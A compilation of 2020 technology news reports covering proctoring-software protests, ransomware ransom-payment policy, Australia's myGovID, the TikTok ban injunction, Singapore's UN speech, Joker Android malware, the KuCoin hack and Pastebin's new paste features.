Information Technology

As the COVID-19 pandemic continues to disrupt the education system, students are fighting back against the remote methods employed by some colleges to keep an eye on their activities during assessments. 

Due to stay-at-home and lockdown orders, teachers and students worldwide were required to pivot to remote learning systems and platforms. Without warning, teachers found themselves trying to engage pupils over Zoom; online libraries and research platforms replaced traditional, brick-and-mortar buildings, and the parents of younger students found themselves balancing work from home and entertaining their kids. 
For many governments, now, keeping kids in school is a top priority — not only for their education but also to free up parents to go back to work. 
See also: Students, university clash over forced installation of remote exam monitoring software on home PCs
As college and university students head to campus to start their new term, at the same time the cold and flu season is beginning, COVID-19 outbreaks are also occurring.
Despite social distancing efforts, thousands of confirmed and suspected cases at US campuses have prompted local lockdowns and students are being told to self-isolate.
In the UK, mere days after welcoming a new wave of students, 32 universities recorded positive cases, including the University of Kent at Canterbury, the University of Glasgow, and Manchester Metropolitan University. In the latter case, students have called imposed lockdowns a form of “false imprisonment.”
The escalating situation may see many students — whether or not they are in college accommodation — return to online-only teaching. However, this has now become a minefield for privacy. 
Back in August, ZDNet reported protests organized by Australian National University (ANU) students for the enforced download of Proctorio, a remote monitoring tool, on personal devices. 
Proctorio is a “secure remote exam” solution for invigilating exams remotely, including features such as microphone and camera monitoring, as well as eye-tracking to flag any behavior deemed suspicious. 
ANU students consider Proctorio an affront to their personal privacy — and one that “crosses the line” as the software was loaded on home PCs, rather than electronics belonging to the university and provided to exam takers. 
This form of activism against surveillance and exam monitoring tools — also known as proctoring software — adopted by colleges is taking shape worldwide, and it is one that academic institutions should watch closely. 
An investigation into student activity in this arena, conducted by digital rights group the Electronic Frontier Foundation (EFF), has found dozens of similar petitions and protests. 
CNET: The best DIY home security system for 2020
Across the globe, students are rising up against the forced use of proctoring software; not only Proctorio but also other variations such as Honorlock and ProctorU. Some of the most noteworthy petitions are below:
University of Texas at Dallas: Students are asking for the removal of Honorlock, claiming the software is a “blatant violation of our privacy as students and infeasible for many.”
California State University Fullerton: Proctorio is at the heart of the conflict here, with students saying, “we believe it is unacceptable in any circumstance for the university to track our keystrokes, access our computers’ cameras, film us in our homes, and use AI technology to determine we look “suspicious.””
Miami University: Students call Proctorio “inherently ableist and discriminatory,” highlighting concerns with racial bias and exam takers with conditions such as ADHD potentially being labeled as moving suspiciously.
Auburn University: Students describe proctoring software as “legitimized spyware.”
The City University of New York: Students successfully reached over 27,000 signatures, ending the compelled use of proctoring software.
Change.org reveals other petitions worldwide, ranging from colleges in Sri Lanka to the UK, Canada, and Italy. 
Schools, colleges, and universities are in an unenviable position. They have been thrust into a world when they are responsible for pupil education but need to rely on remote technology to do so — and they must also work out ways to monitor assessments and exams fairly to reduce the risk of cheating. 
However, with disruption unlikely to end for the educational sector any time soon, educational and social policy should not disregard an individuals’ right to privacy — and it should not become a common and accepted fact of life to have remote surveillance tools installed on personal devices in order to have an academic career.
Security concerns must be addressed, proctoring software needs to be transparent and their use temporary, and the issue of spyware as a forced install on devices that belong to students, rather than educational institutes, needs to be addressed — and quickly.  
TechRepublic: SpyCloud and CyberDefenses join forces on election security effort
“While almost all the petitions we’ve seen raise very real privacy concerns — from biometric data collection to the often overbroad permissions these apps require over the students’ devices, to the surveillance of students’ personal environments — these petitions make clear that proctoring apps also raise concerns about security, equity, accessibility, cost, increased stress, and bias in the technology,” the EFF says. 
ZDNet has reached out to the proctoring software providers mentioned and will update when we hear back. 

Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Police always advise ransomware victims against paying off the criminal gangs that have encrypted their computer systems – and there are many good reasons for that.
At the most basic level, even after the companies have handed over the money, it’s not always certain they will get their data restored. They are negotiating with crooks after all.

But even if they do get their data back, paying up is still a bad idea. It gives the crooks a big payday, which encourages further attacks – perhaps even on the same organisation again. And that big payoff means that gangs can invest in hiring more software developers and hackers to go after even bigger targets.
SEE: Network security policy (TechRepublic Premium)
Paying the ransom might save you pain in the short term but means a bigger problem for everyone else in the longer run.
Currently businesses in the UK are unlikely to be prosecuted for paying up to a ransomware gang – unless there is a reasonable chance of the payment being used to fund terrorism. But at least one senior figure in the security industry thinks that it should be a lot harder or even illegal to pay ransoms.
In a speech earlier this month at security think tank RUSI, former head of the National Cyber Security Centre (NCSC) Ciaran Martin explained just how big a problem the agency considers ransomware to be.
“Right up until my final hours at NCSC last month, I remained of the view that the most likely cause of a major incident was a ransomware attack on an important service,” he said.
“For the attacker, the choice of the service would be incidental. They were just after money. But from the point of view of national harm, that incidental choice of victim could be important. What most kept me awake at night was the prospect of physical harm inadvertently resulting from ransomware.”
He added: “Criminal ransomware used recklessly by amoral criminals is one of the biggest but least discussed scourges of the modern internet.”
Martin said if he had “one policy card to play in the next year”, he would ask for “a serious examination of whether we should change the law to make it illegal for organisations in the UK to pay ransoms in the case of ransomware”.
“The case for doing so is not – and I stress is not – a slam dunk, and if the answer is no [to making paying ransoms illegal], we should think of something else to counter ransomware, because it’s the single biggest contemporary scourge in cyberspace right now.”
Martin said it was a curious anomaly that UK extortion laws are largely based on the experience of kidnapping by terrorist groups.  That is, if you are ransomwared by a proscribed terrorist group, it is illegal to pay, but if the attackers are ordinary criminals, or even state attackers, then it’s fine. “Surely that needs a look,” he said.
It’s thought that as many as half of organisations pay up when hit with ransomware, which has made data-encrypting malware a major source of revenue for sophisticated criminal gangs. Some versions of ransomware have raked in tens of millions in ransom, usually in the form of hard-to-trace cryptocurrencies like bitcoin.
SEE: Mobile security: These seven malicious apps have been downloaded by 2.4m Android and iPhone users
Many victims feel they have little choice but to pay up if the alternative is rebuilding all their computer systems and databases effectively from scratch – and trying not to go out of business as they do it. 
But critics have warned being able to pay the ransom means that ransomware attacks are viewed by some as just another cost of doing business, which means they are less likely to invest in the sometimes-costly security systems that would prevent such attacks.
If paying the ransom were no longer a legal option, companies would have to make sure their systems were robust enough to stop the attackers in the first place. But it would also put much more pressure on police to track down gangs as well. More

The Australian Taxation Office (ATO) is looking to introduce a “liveness” feature to myGovID, the Australian’s government’s digital identity credential.
The agency, which handles myGovID, has gone to market seeking a supplier to deliver a software solution that will allow people who are registering to prove they are a live person and physically present, as well as allow them to take a selfie to verify their identity against a stored identity document, such as their passport or driver’s licence.
The ATO quietly released the app last year to enable citizens to have their identity verified once so they could access government services online using their verified identity, rather than having to continually be verified by each Commonwealth entity.
The ATO emphasised that the successful contractor would need to adhere to strict security guidelines. These include delivering a security management and governance functionality in accordance with the Australian Cyber Security Centre (ACSC) Information Security Manual and Essential Eight mandatory requirements, provide an authenticated log-on for individual ATO users, and configure its IT systems and environments to effectively respond to the latest threats.
Additionally, the ATO said the supplier must utilise securely configured cryptographic data transmission protocols and algorithms to transfer information across untrusted networks, and be able to control the connection of peripheral devices to IT systems that store, process, or transfer ATO information.
See also: Australian Taxation Office happy to go it alone with cybersecurity
Last week, it was revealed that the default login option on myGovID for agents used by the ATO was vulnerable to a code replay attack.
In a blog post, scurity researchers Ben Frengley and Vanessa Teague described how an attacker could use a malicious login form to capture user details, which the attacker could then use to login into other accounts held by the myGovID user.
The pair said they informed the Australian Signals Directorate of the issue on August 19, and were told by the ATO that “they did not intend to change the protocol, at which point we immediately informed them that we would make a warning to users public”.
A spokesperson for the ATO said the flaw was not a “security vulnerability of the myGovID solution or application” and that it can used against login procedures including “passwords, SMS, physical code generators, and mobile apps codes”.
“The approach identified by the researchers, to scam a user by redirecting them to a malicious phishing website requesting credentials, is a well-known and common challenge across authentication systems and is not unique to the myGovID platform,” the spokesperson said.
“The ATO takes IT security very seriously.”
In October, the Digital Transformation Agency said almost 7,000 Australians had created a myGovID.
The ATO said it expected approximately five million Australians would sign up over the first three years of the myGoveID app going live.
As part of the selection process, the tax office said it plans to conduct software trial activities to ensure shortlisted tenderers meet its requirements.
The contract will be for a period to 30 September 2021, with the option to extend it three times for up to two years per extension.
Submissions for the tender closes October 20. 
Related Coverage
More privacy conscious and not Australia Card 2.0: DTA defends digital identity play
The agency spent its entire Senate Estimates appearance explaining what exactly is digital identity and why Australians don’t really know about its existence.
Canberra wants to open digital identity system to commercial sector
The federal government has opened discussions on how the commercial sector can participate in Australia’s digital identity system.
Nearly 7,000 Australians have created a myGovID
By the end of 2018-19, the Digital Transformation Agency said there had been 11,785 downloads of its myGovID iOS smartphone app. More

Image: TikTok
A federal judge has ordered an injunction against the Trump administration’s ban of TikTok, which was set to come into effect on Sunday. 
The ruling was in relation to a lawsuit filed by TikTok that argued the ban undermined the free speech rights of US citizens.
“To ensure that the rule of law is not discarded, and that our company and users are treated fairly, we have no choice but to challenge the executive order through the judicial system,” TikTok said in its originating motion.
The ban had sought to block TikTok and WeChat as well as remove them from the Apple and Google app stores. Additionally, updates to the existing apps would have also been banned. 
The ban would not have prevented existing users from using the apps, however, as long as the apps were already installed prior to the app store removals.
Following the judge’s order, the US Commerce Department, which is responsible for enforcing the ban, issued a statement that said it would “vigorously defend” the ban from legal challenges.
Last week, the US courts issued a similar nationwide injunction against President Donald Trump’s executive order to prevent a WeChat ban from coming into effect. 
For that case, magistrate judge Laurel Beeler granted the injunction as the plaintiffs showed serious questions about whether the ban impinged on the US first amendment. She also acknowledged the ban would provide hardship for the plaintiffs as it would shut down the primary means of communication for the Chinese community.
The TikTok ban was initially scheduled for September 20, but the US Commerce Department delayed it by a week to September 27 due to “recent positive developments” in talks regarding the sale of the US operations of TikTok. 
Earlier this month, Oracle and Walmart announced they would acquire 20% of a newly formed TikTok Global and issue an IPO within 12 months, effectively saving TikTok’s US footprint from being banned.        
The US Commerce Department also has a second TikTok ban on the cards. This second ban has a deadline of November 12, and demands Bytedance to sell TikTok due to national security concerns. This second ban was not part of the injunction that was ordered on Sunday evening.
Both of these bans are the official instruments for enforcing the two executive orders that were signed by President Donald Trump in early August, which had labelled the pair of Chinese apps as national security threats. 
Related Coverage
US district court blocks Trump’s WeChat ban
The presiding judge granted the motion to block the ban as there is ‘scant little evidence’ that it effectively addresses national security concerns.
TikTok to sue US government over ban
Chinese mobile app maker has confirmed plans to “challenge” the Trump administration’s August 6 executive order “through the judiciary system”, though, any lawsuit will not stop its forced sale in the US market.
What TikTok’s big deal means for cloud, e-commerce: TikTok Global created with Oracle, Walmart owning 20%
Oracle and Walmart team up on TikTok’s US operations with an IPO within a year. Oracle lands its cloud customer in TikTok and Walmart eyes e-commerce.
You can bypass TikTok’s MFA by logging in via a browser
Enabling MFA in the TikTok mobile app doesn’t apply it for the web dashboard. TikTok promised to fix the issue.
Microsoft out of race to purchase TikTok as US ban draws near
Oracle reported as being the controversial app’s new ‘trusted tech partner’.
How the TikTok deal still poses pitfalls (TechRepublic)
A deal that would see a new TikTok Global entity owned partly by Oracle and Walmart may still trigger national security concerns. More

Singapore has called on global organisations such as the United Nations (UN) and World Trade Organisation (WTO) to reform, so international rules are in line with cybersecurity and other key digital developments. The Asian nation also underscores the need for unified cooperation against COVID-19, which it notes has accelerated “self-defeating” sentiments worldwide including protectionism and xenophobia. 
Continued international cooperation was key to overcoming the impact of the pandemic as well as to rebuilding, and nations needed to build greater trust and learn from each other, said Singapore’s Minister for Foreign Affairs Vivian Balakrishnan, in the country’s national statement at the UN General Assembly’s General Debate of the 75th session held Saturday. 
Delivered via video message, Balakrishnan said in his speech: “The world is facing a period of prolonged turmoil. The multilateral system is confronted by nationalism, xenophobia, the rejection of free trade and global economic integration, and the bifurcation of technology and supply chains. 

Global pandemic opening up can of security worms
Caught by the sudden onslaught of COVID-19, most businesses lacked or had inadequate security systems in place to support remote work and now have to deal with a new reality that includes a much wider attack surface and less secured user devices.
Read More

“But, these threats are not new. COVID-19 has, in fact, accelerated and intensified these pre-existing trends. Protectionism and unilateral action will ultimately be self-defeating,” the minister said.
He noted that modern supply chains were complex, where it was difficult to locally produce all key items since materials and expertise from elsewhere always would be needed at various steps of the process. This was reflected in the disruptions many countries experienced in the flow of essential goods during lockdowns.
Bifurcation also reduced the global pool of knowledge as well as opportunities for the sharing of benefits from research and innovation. Because countries had been open to sharing scientific knowledge, Balakrishnan noted, test kits could be produced quickly during the early phase of the current pandemic. The same global cooperation now was essential in the development of a vaccine to ensure equitable and universal access, he said. 
He added that global trust would be eroded if contractual obligations for the export of critical goods and movement of people were breached. 
He further underscored the need for rules-based multilateral system to be reformed, so it was “fit for purpose” and able to adapt to the changing realities of today. 
Apart from the need to work together towards a COVID-19 vaccine and to rebuild communities, Balakrishnan urged for continued efforts to address challenges posed by the digital revolution, cybersecurity threats, climate change, and transboundary pollution.
“We must harness new digital technology for the benefit of all our societies whilst mitigating the possible negative impact,” he said. “COVID-19 has accelerated the deployment of artificial intelligence, robotics, digital payments, e-government services, and remote work.”
Globally, governments, businesses, and individuals needed to be able to transact and transfer data securely across borders. This stressed the need for the world to develop a “trusted, open, and inclusive cyberspace” underpinned by international law and norms of responsible state behaviour, the minister said. In this aspect, he noted, Singapore supported the UN Secretary-General’s Roadmap for Digital Cooperation. 
He further urge the need for international institutions to remain inclusive and transparent.
The UN’s role, for instance, was critical, but the 75-year organisation itself needed to “adapt and reform” so it could respond effectively to current and future challenges, and remain relevant for the next 75 years.
The same was true for the WTO, he added. Noting that the international trade organisation’s rules were designed for an agricultural and manufacturing-based world economy, he said WTO today was in urgent need of reform. 
Balakrishnan said: “The world needs appropriate rules for services, especially digital services and intellectual property, in preparation for this digital age that is unfolding in front of us.”
He stressed that open, rules-based multilateral trading system was a foundation for sustainable global recovery and had enabled countries to trade in goods and services in mutually beneficial ways. Post-pandemic, nations must look to further strengthen this system so it could work better for the future. 
“International governance, now more than ever before, needs to be more representative, more inclusive, and more open. We need to take into account a wide spectrum of views and do more to acknowledge the rich diversity of our global community,” the Singapore minister said. 
RELATED COVERAGE More

Image: Zscaler

special feature

Securing Your Mobile Enterprise
Mobile devices continue their march toward becoming powerful productivity machines. But they are also major security risks if they aren’t managed properly. We look at the latest wisdom and best practices for securing the mobile workforce.
Read More

Google has removed this week 17 Android applications from the official Play Store. The 17 apps, spotted by security researchers from Zscaler, were infected with the Joker (aka Bread) malware.
“This spyware is designed to steal SMS messages, contact lists, and device information, along with silently signing up the victim for premium wireless application protocol (WAP) services,” Zscaler security researcher Viral Gandhi said this week.
The 17 malicious apps were uploaded on the Play Store this month and didn’t get a chance to gain a following, having been downloaded more than 120,000 times before being detected.
The names of the 17 apps were:
All Good PDF Scanner
Mint Leaf Message-Your Private Message
Unique Keyboard – Fancy Fonts & Free Emoticons
Tangram App Lock
Direct Messenger
Private SMS
One Sentence Translator – Multifunctional Translator
Style Photo Collage
Meticulous Scanner
Desire Translate
Talent Photo Editor – Blur focus
Care Message
Part Message
Paper Doc Scanner
Blue Scanner
Hummingbird PDF Converter – Photo to PDF
All Good PDF Scanner
Following its internal procedures, Google removed the apps from the Play Store, used the Play Protect service to disable the apps on infected devices, but users still need to manually intervene and remove the apps from their devices.
Joker is the Play Store’s bane
But this recent takedown also marks the third such action from Google’s security team against a batch of Joker-infected apps over the past few months.
Google removed six such apps at the start of the month after they’ve been spotted and reported by security researchers from Pradeo.
Before that, in July, Google removed another batch of Joker-infected apps discovered by security researchers from Anquanke. This batch had been active since March and had managed to infect millions of devices.
The way these infected apps usually manage to sneak their way past Google’s defenses and reach the Play Store is through a technique called “droppers,” where the victim’s device is infected in a multi-stage process.
The technique is quite simple, but hard to defend against, from Google’s perspective.
Malware authors begin by cloning the functionality of a legitimate app and uploading it on the Play Store. This app is fully functional, requests access to dangerous permissions, but also doesn’t perform any malicious actions when it’s first run.
Because the malicious actions are usually delayed by hours or days, Google’s security scans don’t pick up the malicious code, and Google usually allows the app to be listed on the Play Store.
But once on a user’s device, the app eventually downloads and “drops” (hence the name droppers, or loaders) other components or apps on the device that contain the Joker malware or other malware strains.
The Joker family, which Google tracks internally as Bread, has been one of the most ardent users of the dropper technique. This, in turn, has allowed Joker to make it on the Play Store —the Holy Grail of most malware operations— more than many other malware groups.
In January, Google published a blog post where it described Joker as one of the most persistent and advanced threats it has dealt with in the past years. Google said that its security teams had removed more than 1,700 apps from the Play Store since 2017.
But Joker is far more widespread than that, being also found in apps uploaded on third-party Android app stores as well.
All in all, Anquanke said it detected more than 13,000 Joker samples since the malware was first discovered in December 2016.
Protecting against Joker is hard, but if users show some caution when installing apps with broad permissions, they can avoid getting infected.
In other Android security news
Bitdefender reported a batch of malicious apps to Google’s security team. Some of these apps are still available on the Play Store. Bitdefender didn’t reveal the name of the apps, but only the names of the developer accounts from which they were uploaded. Users who have installed apps from these developers should remove them right away.
Nouvette
Piastos 
Progster 
imirova91 
StokeGroove 
VolkavStune 
ThreatFabric also published a report about the demise of the Cerberus malware and the rise of the Alien malware, which contains features to steal credentials for 226 applications. More

Singapore-based cryptocurrency exchange KuCoin disclosed today a mega hack. In a statement posted on its website, the company confirmed that a threat actor breached its systems and emptied its hot wallets of all funds.
Hot wallets are cryptocurrency management apps that are connected to the internet. Cold wallets are stored offline.
Cryptocurrency exchanges like KuCoin use hot wallets as their temporary storage systems for assets that are currently being exchanged on the platform, and they are used to power conversion operations and funds transfers.
KuCoin said it detected the hack after observing “some large withdrawals” from its hot wallets on September 26.
The company said it started a security audit and discovered the missing funds. KuCoin said the hacker managed to steal Bitcoin assets, ERC-20-based tokens, along with other types of tokens.
Currently, the loss is estimated at a minimal $150 million, based on an Etherium address where users tracked some of the stolen funds.
KuCoin has not returned an additional request for comment.
However, KuCoin CEO Johnny Lyu is scheduled to provide additional details about the security breach in a live stream at 12:30 (UTC+8), September 26, 2020.
KuCoin also promised to reimburse users who lost funds in the hack using its cold wallets. Deposits and withdrawals have been temporarily suspended while the company’s security team investigates the incident. More

Image: Pastebin

Pastebin, the most popular website where users can share small snippets of text, has added two new features today that cyber-security researchers believe are going to be widely and wildly abused by malware operators.
Named “Burn After Read” and “Password Protected Pastes,” the two new features allow Pastebin users to create pastes (pieces of text) that expire after a single read or pastes that are protected by a password.
None of the two features are original, as they have been present on many paste sites for years.
However, they are new to Pastebin, which is, by far, today’s most popular pastes portal, being ranked in the Alexa Top 2,000 most popular sites on the internet.
Pastebin has been abused in malware operations
As with anything popular, this has also attracted a lot of bad content that’s has been hosted on the platform. While some people use it to host pieces of code or text they wanted to share with a colleague, over the past decade, Pastebin has also turned into a de-facto hosting service for malicious code.
Across the years, malware authors have used Pastebin to store malicious commands that they retrieve and run on infected hosts, hacked data, IP addresses for malware command and control servers, and many other operational details.
Ted Samuels, an incident response (IR) consultant, told ZDNet today that it’s hard to put a number or percentage on Pastebin’s presence in malware operations, but described it as “not uncommon.”
“Pastebin is by far the most prolific ‘paste site’ and fairly popular staging ground for fileless attacks using PowerShell. For example, a threat actor’s initial payload may use PowerShell to download additional (and often obfuscated) content from pastebin.com for further execution via PowerShell. The prolific CobaltStrike framework can be loaded this way.”
To counteract Pastebin’s rising popularity among malware devs, throughout the years, cyber-security companies have created tools that scrape new Pastebin entries to search for malicious or sensitive-looking content as soon as it’s uploaded on the site. These malicious pastes are indexed in private threat intel databases that are later used for incident response, and are also reported to Pastebin to have them taken down.
But now, security researchers argue that by adding the two new features today, Pastebin is blocking their good-will efforts to detect malware operations and is catering more to the malware crowd rather than actual users and the good guys.
“Unless they’re taking measures that aren’t immediately apparent to prevent the use of Burn After Reading and Password Protection for C2 and malware staging, those would seem to be pretty helpful new features for attackers who use PasteBin for those ends,” Brian, a security researcher from Pittsburgh, told ZDNet.

I can already see how this is going to be abused by threat actors.Going to make tracking these threats 100x harder.Who is pastebin working for? Security or threat actors? https://t.co/wX088qpX7Z
— Jake (@JCyberSec_) September 25, 2020

But the new features go beyond just detecting what was uploaded on the site in real-time. It also impacts post-infection IR investigations.
“This new change will now make it harder for incident responders to quickly evaluate what may have been downloaded and executed in some environments,” Samuels told ZDNet.
Long-time bad blood
But the acidic reaction towards Pastebin’s two new features today is also because of the cyber-security community’s rocky relationship with the site.
Across the years, security researchers have often accused its admins of dragging their feet when needing to take down malicious pastes. Things got very heated earlier this year in April when Pastebin wanted to discontinue the Scraping API; a tool cyber-security researchers were using to detect new content being uploaded on Pastebin.
Pastebin backtracked on the change after massive backlash and media coverage.
It is unclear what Pastebin thinks of the cyber-security community’s latest reaction to its newest features, but in an email, the company said it added “Burn After Read” and “Password Protected Pastes” at the request of its users
“Pastebin stores important data for our users starting from calculations and engineering data, such as algorithms, logs from various services, robots, network devices and ending with proprietary software code,” the company said.
“We have received many requests from our users to implement these features because of their privacy rights, and to help our users protect their work.”
“Pastebin was created by developers for developers, and is used globally by millions. Of course, every platform has bad actors that try to take advantage, including Github, Twitter, Facebook, Dropbox, Privnotes & Sendspace to name a few,” Pastebin said.
As Pastebin pointed out, cyber-security researchers may also be overreacting, as there are dozens of other paste sites like Pastebin around, some of which are even more lenient towards allowing abuse on their platforms when compared to Pastebin.
“Of course there is some overreaction from infosec Twitter, and it’s not just Pastebin. There are many paste sites with similar functionality, postb.in for example,” Samuels said.
Keeping sites like Pastebin accountable for the features they support is necessary, but the two new features also have legitimate uses. If Pastebin is truly so bad, then other actions should have been taken years ago.
“Pastebin and others paste websites should be blocked inside company networks,” SwitHak, a security researcher from France, told ZDNet.
“We know that it is used by bad guys. We need to act in consequence.
“We know the vector, let’s burn it and force attackers to use their own servers. If they host the malware configuration on their own servers, we can burn the attackers’ infrastructure. It’s about making the attack more complicated for the attackers, forcing them to play in our field and imposing cost,” SwitHak added.

However, Pastebin says that while the two new features might be abused, the company also has features to help the good guys.
Earlier this year, we introduced the new Enterprise API subscription to provide better data subscription for our business customers.
Partnered with global cyber security companies for the protection of our site as well as enriching the data of their products and services.
Partnered with global CERTs (Computer Incident Response Center Luxembourg, Canadian Centre for Cyber Security, Austrian Energy CERT) and law enforcement agencies.
Internally, as it relates to malicious content, in partnership with the organizations mentioned above, we take proper actions in mitigating these data.
For researchers, academia and industry organizations approved by us, we grant this access at no cost.
Lastly, implementation of Abuse Management and Threat Analysis teams who work closely with law enforcement and industry partners.
Updated with comments from Pastebin, as they arrived post publication. More